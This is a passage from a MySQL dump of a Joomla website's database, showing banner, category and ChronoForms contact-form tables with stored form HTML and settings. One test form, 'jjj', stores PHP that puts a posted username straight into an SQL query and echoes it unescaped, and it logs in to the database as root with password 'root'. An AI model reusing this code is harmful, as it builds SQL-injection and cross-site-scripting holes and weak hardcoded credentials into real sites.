`bak_fit_bss_banner` -- LOCK TABLES `bak_fit_bss_banner` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_banner` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_banner` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_bannerclient` -- DROP TABLE IF EXISTS `bak_fit_bss_bannerclient`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_bannerclient` ( `cid` int(11) NOT NULL auto_increment, `name` varchar(255) NOT NULL default '', `contact` varchar(255) NOT NULL default '', `email` varchar(255) NOT NULL default '', `extrainfo` text NOT NULL, `checked_out` tinyint(1) NOT NULL default '0', `checked_out_time` time default NULL, `editor` varchar(50) default NULL, PRIMARY KEY (`cid`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_bannerclient` -- LOCK TABLES `bak_fit_bss_bannerclient` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_bannerclient` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_bannerclient` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_bannertrack` -- DROP TABLE IF EXISTS `bak_fit_bss_bannertrack`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_bannertrack` ( `track_date` date NOT NULL default '0000-00-00', `track_type` int(10) unsigned NOT NULL default '0', `banner_id` int(10) unsigned NOT NULL default '0' ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_bannertrack` -- LOCK TABLES `bak_fit_bss_bannertrack` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_bannertrack` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_bannertrack` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_categories` -- DROP TABLE IF EXISTS `bak_fit_bss_categories`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_categories` ( `id` int(11) NOT NULL auto_increment, `parent_id` int(11) NOT NULL default '0', `title` varchar(255) NOT NULL default '', `name` varchar(255) NOT NULL default '', `alias` varchar(255) NOT NULL default '', `image` varchar(255) NOT NULL default '', `section` varchar(50) NOT NULL default '', `image_position` varchar(30) NOT NULL default '', `description` text NOT NULL, `published` tinyint(1) NOT NULL default '0', `checked_out` int(11) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `editor` varchar(50) default NULL, `ordering` int(11) NOT NULL default '0', `access` tinyint(3) unsigned NOT NULL default '0', `count` int(11) NOT NULL default '0', `params` text NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=71 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_categories` -- LOCK TABLES `bak_fit_bss_categories` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_categories` DISABLE KEYS */; INSERT INTO `bak_fit_bss_categories` VALUES (60,0,'top article','','top-article','','10','left','',1,0,'0000-00-00 00:00:00',NULL,1,0,0,''),(61,0,'About us','','about-us','','11','left','',1,0,'0000-00-00 00:00:00',NULL,1,0,0,''),(62,0,'NEWS & EVENTS','','news-a-events','','11','left','',1,0,'0000-00-00 00:00:00',NULL,2,0,0,''),(63,0,'PRIVACY POLICY','','privacy-policy','','11','left','',1,0,'0000-00-00 00:00:00',NULL,2,0,0,''),(64,0,'TESTIMONIALS','','testimonials','','11','left','',1,0,'0000-00-00 00:00:00',NULL,2,0,0,''),(65,0,'PRODUCTS','','products','','11','left','',1,62,'2012-03-20 05:40:57',NULL,2,0,0,''),(66,0,'SOLUTIONS','','solutions','','11','left','',1,0,'0000-00-00 00:00:00',NULL,2,0,0,''),(68,0,'CONTACT US','','contact-us','','11','left','',1,0,'0000-00-00 00:00:00',NULL,3,0,0,''),(69,0,'CONTACT FORM','','contact-form','','com_contact_details','left','',1,0,'0000-00-00 00:00:00',NULL,1,0,0,''),(70,0,'clients','','clients','','10','left','',1,0,'0000-00-00 00:00:00',NULL,2,0,0,''); /*!40000 ALTER TABLE `bak_fit_bss_categories` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_chrono_contact` -- DROP TABLE IF EXISTS `bak_fit_bss_chrono_contact`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_chrono_contact` ( `id` int(11) NOT NULL auto_increment, `name` text NOT NULL, `html` longtext NOT NULL, `scriptcode` longtext NOT NULL, `stylecode` longtext NOT NULL, `redirecturl` text NOT NULL, `emailresults` tinyint(1) NOT NULL default '0', `fieldsnames` text NOT NULL, `fieldstypes` text NOT NULL, `onsubmitcode` longtext NOT NULL, `onsubmitcodeb4` longtext NOT NULL, `server_validation` longtext NOT NULL, `attformtag` longtext NOT NULL, `submiturl` text NOT NULL, `emailtemplate` longtext NOT NULL, `useremailtemplate` longtext NOT NULL, `paramsall` longtext NOT NULL, `titlesall` longtext NOT NULL, `extravalrules` longtext NOT NULL, `dbclasses` longtext NOT NULL, `autogenerated` longtext NOT NULL, `chronocode` longtext NOT NULL, `theme` text NOT NULL, `published` tinyint(1) NOT NULL default '0', `extra1` longtext NOT NULL, `extra2` longtext NOT NULL, `extra3` longtext NOT NULL, `extra4` longtext NOT NULL, `extra5` longtext NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=10 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_chrono_contact` -- LOCK TABLES `bak_fit_bss_chrono_contact` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_chrono_contact` DISABLE KEYS */; INSERT INTO `bak_fit_bss_chrono_contact` VALUES (2,'jjj','<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">username</label>\r\n <input class=\"cf_inputbox required\" maxlength=\"150\" size=\"30\" title=\"\" id=\"username\" name=\"username\" type=\"text\" />\r\n <a class=\"tooltiplink\" onclick=\"return false;\"><img height=\"16\" border=\"0\" width=\"16\" class=\"tooltipimg\" alt=\"\" src=\"components/com_chronocontact/css/images/tooltip.png\"/></a>\r\n <div class=\"tooltipdiv\">username :: enter username</div>\r\n </div>\r\n<div> <input id=\"button_0\" name=\"button_0\" type=\"submit\" /></div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n','','','',0,'username','text','<?php\r\n<script type=\"text/javaxcript\">\r\nalert ($_POST[\'username\']);\r\n</script>\r\necho \"aaaaaaaaa\".$_POST[\'username\'];\r\n$con=mysql_connect(\"localhost\",\"root\",\"root\");\r\nmysql_select_db(\"jepa\", $con);\r\n$query=\"insert into fit_bss_users (username) values($_POST[\'username\'])\";\r\nmysql_query($query);\r\nmysql_close($con);\r\n?>','<?php\r\n<script type=\"text/javaxcript\">\r\nalert ($_POST[\'username\']);\r\n</script>\r\necho \"aaaaaaaaa\".$_POST[\'username\'];\r\n$con=mysql_connect(\"localhost\",\"root\",\"root\");\r\nmysql_select_db(\"jepa\", $con);\r\n$query=\"insert into fit_bss_users (username) values($_POST[\'username\'])\";\r\nmysql_query($query);\r\nmysql_close($con);\r\n?>','','','','','','formmethod=post\nLoadFiles=Yes\nsubmissions_limit=\nsubmissions_limit_error=Sorry but you can not submit the form again very soon like this!\nhandlepostedarrays=Yes\ndebug=0\ncheckToken=1\nmysql_type=1\nenmambots=No\ncaptcha_dataload=0\ncaptcha_dataload_skip=\nuseCurrent=\ndatefieldformat=d/m/Y\ndatefieldsnames=\ndatefieldextras=classes: [\'dashboard\']\ndbconnection=Yes\nsavedataorder=before_email\ndvfields=\ndvrecord=Record #n\nuploads=No\nuploadfields=\nuploadpath=C:\\wamp\\www\\jepa\\components\\com_chronocontact\\uploads\\jjj\\\nfilename_format=$filename = date(\'YmdHis\').\'_\'.$chronofile[\'name\'];\nupload_exceedslimit=Sorry, Your uploaded file size exceeds the allowed limit.\nupload_lesslimit=Sorry, Your uploaded file size is less than the allowed limit\nupload_notallowed=Sorry, Your uploaded file type is not allowed\nimagever=No\nimtype=0\nimgver_error_msg=You have entered an incorrect verification code at the bottom of the form.\nvalidate=No\nvalidatetype=mootools\nvalidate_onlyOnBlur=1\nvalidate_wait=\nvalidate_onlyOnSubmit=0\nvalidation_type=default\nval_required=\nval_validate_number=\nval_validate_digits=\nval_validate_alpha=\nval_validate_alphanum=\nval_validate_date=\nval_validate_email=\nval_validate_url=\nval_validate_date_au=\nval_validate_currency_dollar=\nval_validate_selection=\nval_validate_one_required=\nval_validate_confirmation=\nservervalidate=No\nautogenerated_order=3\nonsubmitcode_order=2\nplugins_order=1\nplugins=\nmplugins_order=\ntablenames=fit_bss_users','','','<?php\nif (!class_exists(\'Tableusers\')) {\nclass Tableusers extends JTable {\nvar $id = null;\nvar $name = null;\nvar $username = null;\nvar $email = null;\nvar $password = null;\nvar $usertype = null;\nvar $block = null;\nvar $sendEmail = null;\nvar $gid = null;\nvar $registerDate = null;\nvar $lastvisitDate = null;\nvar $activation = null;\nvar $params = null;\nfunction __construct( &$database ) {\nparent::__construct( \'fit_bss_users\', \'id\', $database );\n}\n}\n}\n?>\n','<?php\n $MyForm =& CFChronoForm::getInstance(\"jjj\");\n if($MyForm->formparams(\"dbconnection\") == \"Yes\"){\n $user = JFactory::getUser(); \n $row =& JTable::getInstance(\"users\", \"Table\");\n srand((double)microtime()*10000);\n $inum = \"I\" . substr(base64_encode(md5(rand())), 0, 16).md5(uniqid(mt_rand(), true));\n JRequest::setVar( \"recordtime\", JRequest::getVar( \"recordtime\", date(\"Y-m-d\").\" - \".date(\"H:i:s\"), \"post\", \"string\", \"\" ));\n JRequest::setVar( \"ipaddress\", JRequest::getVar( \"ipaddress\", $_SERVER[\"REMOTE_ADDR\"], \"post\", \"string\", \"\" ));\n JRequest::setVar( \"uid\", JRequest::getVar( \"uid\", $inum, \"post\", \"string\", \"\" ));\n JRequest::setVar( \"cf_user_id\", JRequest::getVar( \"cf_user_id\", $user->id, \"post\", \"int\", \"\" ));\n $post = JRequest::get( \"post\" , JREQUEST_ALLOWRAW ); \n if (!$row->bind( $post )) {\n JError::raiseWarning(100, $row->getError());\n } \n if (!$row->store()) {\n JError::raiseWarning(100, $row->getError());\n }\n $MyForm->tablerow[\"fit_bss_users\"] = $row;\n }\n ?>\n ','[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_0CHRONO_CONSTANT_EOLname = text_0CHRONO_CONSTANT_EOLclass = cf_inputbox requiredCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = usernameCHRONO_CONSTANT_EOLtooltiptext = username :: enter usernameCHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL','default',1,'','','','',''),(3,'basicDemo','<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Name</label>\r\n <input class=\"cf_inputbox required\" maxlength=\"150\" size=\"30\" title=\"Please enter your name\" id=\"text_1\" name=\"name\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Email address:</label>\r\n <input class=\"cf_inputbox required validate-email\" maxlength=\"150\" size=\"30\" title=\"Please enter your email address\" id=\"text_2\" name=\"email\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Subject</label>\r\n <input class=\"cf_inputbox required\" maxlength=\"150\" size=\"30\" title=\"Please enter a subject for your message\" id=\"text_3\" name=\"subject\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textarea\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Message</label>\r\n <textarea class=\"cf_inputbox required\" rows=\"5\" id=\"text_4\" title=\"Please enter your message\" cols=\"40\" name=\"message\"></textarea>\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_button\">\r\n <input value=\"Submit\" name=\"button_5\" type=\"submit\" />\r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n','','','',2,'name,email,subject,message','text,text,text,textarea','<p>Thank you for contacting us at Mywebsite.com, we have received your message and we will get back to you ASAP!</p>\r\n<p><span style=\"color: #ff0000;\">Hey admin, you need to configure the emaisl addresses in the admin area for the real form to be sent to</span> <strong>YOU</strong></p>','','','','','','','formmethod=post\nLoadFiles=Yes\nsubmissions_limit=\nsubmissions_limit_error=Sorry but you can not submit the form again very soon like this!\nhandlepostedarrays=Yes\ndebug=0\ncheckToken=1\nmysql_type=1\nenmambots=No\ncaptcha_dataload=0\ncaptcha_dataload_skip=\nuseCurrent=\ndatefieldformat=d/m/Y\ndatefieldsnames=\ndatefieldextras=classes: [\'dashboard\']\ndbconnection=No\nsavedataorder=after_email\ndvfields=\ndvrecord=Record #n\nuploads=No\nuploadfields=\nuploadpath=C:\\xampp\\htdocs\\xampp\\chronosim2\\components\\com_chronocontact\\uploads\\basicDemo\\\nfilename_format=$filename = date(\'YmdHis\').\'_\'.$chronofile[\'name\'];\nupload_exceedslimit=Sorry, Your uploaded file size exceeds the allowed limit.\nupload_lesslimit=Sorry, Your uploaded file size is less than the allowed limit\nupload_notallowed=Sorry, Your uploaded file type is not allowed\nimagever=No\nimtype=0\nimgver_error_msg=You have entered an incorrect verification code at the bottom of the form.\nvalidate=No\nvalidatetype=mootools\nvalidate_onlyOnBlur=1\nvalidate_wait=\nvalidate_onlyOnSubmit=0\nvalidation_type=default\nval_required=\nval_validate_number=\nval_validate_digits=\nval_validate_alpha=\nval_validate_alphanum=\nval_validate_date=\nval_validate_email=\nval_validate_url=\nval_validate_date_au=\nval_validate_currency_dollar=\nval_validate_selection=\nval_validate_one_required=\nval_validate_confirmation=\nservervalidate=No\nautogenerated_order=3\nonsubmitcode_order=2\nplugins_order=1\nplugins=\nmplugins_order=\ntablenames=','','','','','[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_1CHRONO_CONSTANT_EOLname = nameCHRONO_CONSTANT_EOLclass = cf_inputbox requiredCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = Please enter your nameCHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = NameCHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_2CHRONO_CONSTANT_EOLname = emailCHRONO_CONSTANT_EOLclass = cf_inputbox required validate-emailCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = Please enter your email addressCHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = Email address:CHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_3CHRONO_CONSTANT_EOLname = subjectCHRONO_CONSTANT_EOLclass = cf_inputbox requiredCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = Please enter a subject for your messageCHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = SubjectCHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textarea\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_4CHRONO_CONSTANT_EOLname = messageCHRONO_CONSTANT_EOLclass = cf_inputbox requiredCHRONO_CONSTANT_EOLrows = 5CHRONO_CONSTANT_EOLcols = 40CHRONO_CONSTANT_EOLtitle = Please enter your messageCHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = MessageCHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_button\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLvalue = SubmitCHRONO_CONSTANT_EOLname = button_5CHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLreset = 0CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 0CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL','default',1,'','','','',''),(5,'basicDemo','<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Name</label>\r\n <input class=\"cf_inputbox required\" maxlength=\"150\" size=\"30\" title=\"Please enter your name\" id=\"text_1\" name=\"name\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Email address:</label>\r\n <input class=\"cf_inputbox required validate-email\" maxlength=\"150\" size=\"30\" title=\"Please enter your email address\" id=\"text_2\" name=\"email\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Subject</label>\r\n <input class=\"cf_inputbox required\" maxlength=\"150\" size=\"30\" title=\"Please enter a subject for your message\" id=\"text_3\" name=\"subject\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textarea\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Message</label>\r\n <textarea class=\"cf_inputbox required\" rows=\"5\" id=\"text_4\" title=\"Please enter your message\" cols=\"40\" name=\"message\"></textarea>\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_button\">\r\n <input value=\"Submit\" name=\"button_5\" type=\"submit\" />\r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n','','','',2,'name,email,subject,message','text,text,text,textarea','<p>Thank you for contacting us at Mywebsite.com, we have received your message and we will get back to you ASAP!</p>\r\n<p><span style=\"color: #ff0000;\">Hey admin, you need to configure the emaisl addresses in the admin area for the real form to be sent to</span> <strong>YOU</strong></p>','','','','','','','formmethod=post\nLoadFiles=Yes\nsubmissions_limit=\nsubmissions_limit_error=Sorry but you can not submit the form again very soon like this!\nhandlepostedarrays=Yes\ndebug=0\ncheckToken=1\nmysql_type=1\nenmambots=No\ncaptcha_dataload=0\ncaptcha_dataload_skip=\nuseCurrent=\ndatefieldformat=d/m/Y\ndatefieldsnames=\ndatefieldextras=classes: [\'dashboard\']\ndbconnection=No\nsavedataorder=after_email\ndvfields=\ndvrecord=Record #n\nuploads=No\nuploadfields=\nuploadpath=C:\\xampp\\htdocs\\xampp\\chronosim2\\components\\com_chronocontact\\uploads\\basicDemo\\\nfilename_format=$filename = date(\'YmdHis\').\'_\'.$chronofile[\'name\'];\nupload_exceedslimit=Sorry, Your uploaded file size exceeds the allowed limit.\nupload_lesslimit=Sorry, Your uploaded file size is less than the allowed limit\nupload_notallowed=Sorry, Your uploaded file type is not allowed\nimagever=No\nimtype=0\nimgver_error_msg=You have entered an incorrect verification code at the bottom of the form.\nvalidate=No\nvalidatetype=mootools\nvalidate_onlyOnBlur=1\nvalidate_wait=\nvalidate_onlyOnSubmit=0\nvalidation_type=default\nval_required=\nval_validate_number=\nval_validate_digits=\nval_validate_alpha=\nval_validate_alphanum=\nval_validate_date=\nval_validate_email=\nval_validate_url=\nval_validate_date_au=\nval_validate_currency_dollar=\nval_validate_selection=\nval_validate_one_required=\nval_validate_confirmation=\nservervalidate=No\nautogenerated_order=3\nonsubmitcode_order=2\nplugins_order=1\nplugins=\nmplugins_order=\ntablenames=','','','','','[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_1CHRONO_CONSTANT_EOLname = nameCHRONO_CONSTANT_EOLclass = cf_inputbox requiredCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = Please enter your nameCHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = NameCHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_2CHRONO_CONSTANT_EOLname = emailCHRONO_CONSTANT_EOLclass = cf_inputbox required validate-emailCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = Please enter your email addressCHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = Email address:CHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_3CHRONO_CONSTANT_EOLname = subjectCHRONO_CONSTANT_EOLclass = cf_inputbox requiredCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = Please enter a subject for your messageCHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = SubjectCHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textarea\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_4CHRONO_CONSTANT_EOLname = messageCHRONO_CONSTANT_EOLclass = cf_inputbox requiredCHRONO_CONSTANT_EOLrows = 5CHRONO_CONSTANT_EOLcols = 40CHRONO_CONSTANT_EOLtitle = Please enter your messageCHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = MessageCHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_button\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLvalue = SubmitCHRONO_CONSTANT_EOLname = button_5CHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLreset = 0CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 0CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL','default',0,'','','','',''),(6,'RequestForm','\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">First Name:</label>\r\n <input class=\"cf_inputbox required\" maxlength=\"150\" size=\"30\" title=\"\" id=\"text_1\" name=\"text_1\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Last Name:</label>\r\n <input class=\"cf_inputbox required\" maxlength=\"150\" size=\"30\" title=\"\" id=\"text_2\" name=\"text_2\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_textbox\">\r\n <label class=\"cf_label\" style=\"width: 150px;\">Your Phone Number:</label>\r\n <input class=\"cf_inputbox required\" maxlength=\"150\" size=\"30\" title=\"\" id=\"text_4\" name=\"text_4\" type=\"text\" />\r\n \r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n\r\n<div class=\"form_item\">\r\n <div class=\"form_element cf_button\">\r\n <input value=\"Send\" name=\"button_12\" type=\"submit\" />\r\n </div>\r\n <div class=\"cfclear\"> </div>\r\n</div>\r\n','','','',2,'text_1,text_2,text_4','text,text,text','<p><span style=\"color: #140b0c; font-family: Arial; font-weight: bold; line-height: normal;\">Thank You for Sending Your Request, We will Contact You As Soon As Possible.</span></p>','','','','','','','formmethod=post\nLoadFiles=Yes\nsubmissions_limit=\nsubmissions_limit_error=Sorry but you can not submit the form again very soon like this!\nhandlepostedarrays=Yes\ndebug=0\ncheckToken=1\nmysql_type=1\nenmambots=No\ncaptcha_dataload=0\ncaptcha_dataload_skip=\nuseCurrent=\ndatefieldformat=d/m/Y\ndatefieldsnames=\ndatefieldextras=classes: [\'dashboard\']\ndbconnection=No\nsavedataorder=after_email\ndvfields=\ndvrecord=Record #n\nuploads=No\nuploadfields=\nuploadpath=/home/jepaorg/public_html/components/com_chronocontact/uploads/FreeTrial/\nfilename_format=$filename = date(\'YmdHis\').\'_\'.$chronofile[\'name\'];\nupload_exceedslimit=Sorry, Your uploaded file size exceeds the allowed limit.\nupload_lesslimit=Sorry, Your uploaded file size is less than the allowed limit\nupload_notallowed=Sorry, Your uploaded file type is not allowed\nimagever=No\nimtype=0\nimgver_error_msg=You have entered an incorrect verification code at the bottom of the form.\nvalidate=No\nvalidatetype=mootools\nvalidate_onlyOnBlur=1\nvalidate_wait=\nvalidate_onlyOnSubmit=0\nvalidation_type=default\nval_required=\nval_validate_number=\nval_validate_digits=\nval_validate_alpha=\nval_validate_alphanum=\nval_validate_date=\nval_validate_email=\nval_validate_url=\nval_validate_date_au=\nval_validate_currency_dollar=\nval_validate_selection=\nval_validate_one_required=\nval_validate_confirmation=\nservervalidate=No\nautogenerated_order=3\nonsubmitcode_order=2\nplugins_order=1\nplugins=\nmplugins_order=\ntablenames=','','','','','[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_1CHRONO_CONSTANT_EOLname = text_1CHRONO_CONSTANT_EOLclass = cf_inputbox requiredCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = First Name:CHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_2CHRONO_CONSTANT_EOLname = text_2CHRONO_CONSTANT_EOLclass = cf_inputbox requiredCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = Last Name:CHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = CHRONO_CONSTANT_EOL}]CHRONO_CONSTANT_EOL[type=\"cf_textbox\"CHRONO_CONSTANT_EOL{CHRONO_CONSTANT_EOLid = text_4CHRONO_CONSTANT_EOLname = text_4CHRONO_CONSTANT_EOLclass = cf_inputbox requiredCHRONO_CONSTANT_EOLtype = textCHRONO_CONSTANT_EOLsize = 30CHRONO_CONSTANT_EOLmaxlength = 150CHRONO_CONSTANT_EOLtitle = CHRONO_CONSTANT_EOLhidelabel = 0CHRONO_CONSTANT_EOLlabelwidth = 150pxCHRONO_CONSTANT_EOLlabeltext = Your Phone Number:CHRONO_CONSTANT_EOLtooltiptext = CHRONO_CONSTANT_EOLslabel = 